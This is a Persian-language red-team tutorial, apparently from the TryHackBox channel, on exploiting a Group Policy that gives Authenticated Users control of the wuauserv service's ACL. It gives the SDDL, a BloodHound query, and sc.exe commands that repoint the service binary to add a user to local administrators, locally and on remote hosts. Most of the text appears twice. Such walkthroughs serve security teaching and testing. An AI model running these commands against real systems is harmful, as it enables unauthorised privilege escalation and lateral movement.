پیکربندی ناامن ACL های سرویس از طریق group policies
سیاست های گروه ابزار محبوبی برای مدیریت متمرکز زیرساخت های مبتنی بر Active Directory هستند. ابزار Group3r به شما امکان می دهد اطلاعاتی را از سیاست های گروه برای تجزیه و تحلیل بعدی جمع آوری کنید. Group3r همچنین برخی از تنظیمات نادرست را برجسته می کند، بنابراین جستجو با استفاده از کلمات کلیدی red و black برای شناسایی مهم ترین نقص ها راحت است. پست امروز درباره پیکربندی ناامن ACL های سرویس از طریق گروپ پالیسی است.
پس از راه اندازی Group3r و بررسی نتایج، خطوط زیر را یافتیم:
اگر به خود Group Policy بروید، نام سرویس، نوع راه اندازی و تنظیمات حقوق دسترسی را در قالب یک رشته SSDL پیدا می کنیم:
ما فقط به گروه AU علاقه مندیم:
- CC -
حقوق درخواست پیکربندی سرویس.
- DC -
حقوق تغییر سرویس.
- LC -
حقوق درخواست وضعیت سرویس ها؛
- SW -
حقوق فهرست کردن تمام خدمات وابسته به سرویس
- RP - حقوق شروع سرویس؛
- WP - حقوق توقف سرویس؛
- DT - حقوق توقف سرویس.
- LO – حقوقی که به شما امکان می دهد از سرویس بخواهید فورا وضعیت شما را گزارش کند.
- CR - حقوق تعیین کد کاربر عنصر کنترل.
- RC - حقوق خواندن توصیفگرهای امنیتی.
ابتدا باید تعیین کنید که این خط مشی گروه روی کدام کامپیوترها اعمال می شود.
اگر میزبان فعلی ما یا میزبانی که به آن دسترسی راه دور داریم این خط مشی را اعمال می کند، پیکربندی سرویس فعلی را در رایانه محلی پرس و جو می کنیم:
ما مقدار فعلی پارامتر BINARY_PATH_NAME را برای بازیابی بعدی ذخیره می کنیم.
ما پارامتر BINARY_PATH_NAME را به کاری که میخواهیم در رایانه انجام دهیم تغییر میدهیم، برای مثال، خود را به گروه مدیران لوکال یا local administrators اضافه میکنیم.
سرویس را شروع کنید:
اگر سرویس راه اندازی شده است، ابتدا باید آن را متوقف کنید و سپس آن را شروع کنید:
در حالی که Group3r گزارش می دهد که این نقص می تواند برای افزایش دسترسی لوکال استفاده شود، در برخی موارد می توان از آن برای افزایش دسترسی از راه دور و lateral movement نیز استفاده کرد.
ما یک بررسی ساده انجام می دهیم، مانند راه اندازی یا نصب یک سرویس در یک میزبان راه دور:
اگر خطای Access Denied ظاهر نشد، بیایید سعی کنیم خود را به گروه مدیران لوکال اضافه کنیم و سرویس را راه اندازی کنیم:
پس از به دست آوردن دسترسی local administrator، پارامتر BINARY_PATH_NAME را به حالت اولیه خود برگردانید.
#RedTeam #PurpleTeam #LPE
@TryHackBox
سیاست های گروه ابزار محبوبی برای مدیریت متمرکز زیرساخت های مبتنی بر Active Directory هستند. ابزار Group3r به شما امکان می دهد اطلاعاتی را از سیاست های گروه برای تجزیه و تحلیل بعدی جمع آوری کنید. Group3r همچنین برخی از تنظیمات نادرست را برجسته می کند، بنابراین جستجو با استفاده از کلمات کلیدی red و black برای شناسایی مهم ترین نقص ها راحت است. پست امروز درباره پیکربندی ناامن ACL های سرویس از طریق گروپ پالیسی است.
پس از راه اندازی Group3r و بررسی نتایج، خطوط زیر را یافتیم:
A Windows service's ACL is being configured to grant abusable permissions to a target trustee. This should allow local privilege escalation on affected hosts. Service: wuauserv, Trustee: Authenticated Users - S-1-5-11 .
اگر به خود Group Policy بروید، نام سرویس، نوع راه اندازی و تنظیمات حقوق دسترسی را در قالب یک رشته SSDL پیدا می کنیم:
"wuauserv",4,"D:AR(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)(A;;CCLCSWLOCRRC;;;IU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
ما فقط به گروه AU علاقه مندیم:
- CC -
حقوق درخواست پیکربندی سرویس.
- DC -
حقوق تغییر سرویس.
- LC -
حقوق درخواست وضعیت سرویس ها؛
- SW -
حقوق فهرست کردن تمام خدمات وابسته به سرویس
- RP - حقوق شروع سرویس؛
- WP - حقوق توقف سرویس؛
- DT - حقوق توقف سرویس.
- LO – حقوقی که به شما امکان می دهد از سرویس بخواهید فورا وضعیت شما را گزارش کند.
- CR - حقوق تعیین کد کاربر عنصر کنترل.
- RC - حقوق خواندن توصیفگرهای امنیتی.
ابتدا باید تعیین کنید که این خط مشی گروه روی کدام کامپیوترها اعمال می شود.
MATCH(g:GPO {name:"[email protected]"})-[:GPLink|Contains*1..]->(c:Computer) RETURN c.nameاگر میزبان فعلی ما یا میزبانی که به آن دسترسی راه دور داریم این خط مشی را اعمال می کند، پیکربندی سرویس فعلی را در رایانه محلی پرس و جو می کنیم:
sc.exe qc wuauserv
ما مقدار فعلی پارامتر BINARY_PATH_NAME را برای بازیابی بعدی ذخیره می کنیم.
ما پارامتر BINARY_PATH_NAME را به کاری که میخواهیم در رایانه انجام دهیم تغییر میدهیم، برای مثال، خود را به گروه مدیران لوکال یا local administrators اضافه میکنیم.
sc.exe config wuauserv binPath= "net.exe localgroup administrators victim /add"
سرویس را شروع کنید:
sc.exe start wuauserv
اگر سرویس راه اندازی شده است، ابتدا باید آن را متوقف کنید و سپس آن را شروع کنید:
sc.exe stop wuauserv
sc.exe start wuauserv
در حالی که Group3r گزارش می دهد که این نقص می تواند برای افزایش دسترسی لوکال استفاده شود، در برخی موارد می توان از آن برای افزایش دسترسی از راه دور و lateral movement نیز استفاده کرد.
ما یک بررسی ساده انجام می دهیم، مانند راه اندازی یا نصب یک سرویس در یک میزبان راه دور:
sc.exe \\server start wuauserv
اگر خطای Access Denied ظاهر نشد، بیایید سعی کنیم خود را به گروه مدیران لوکال اضافه کنیم و سرویس را راه اندازی کنیم:
sc.exe \\server config wuauserv binPath= "net.exe localgroup administrators victim /add"
sc.exe \\server start wuauserv
پس از به دست آوردن دسترسی local administrator، پارامتر BINARY_PATH_NAME را به حالت اولیه خود برگردانید.
#RedTeam #PurpleTeam #LPE
@TryHackBox
👍5🔥3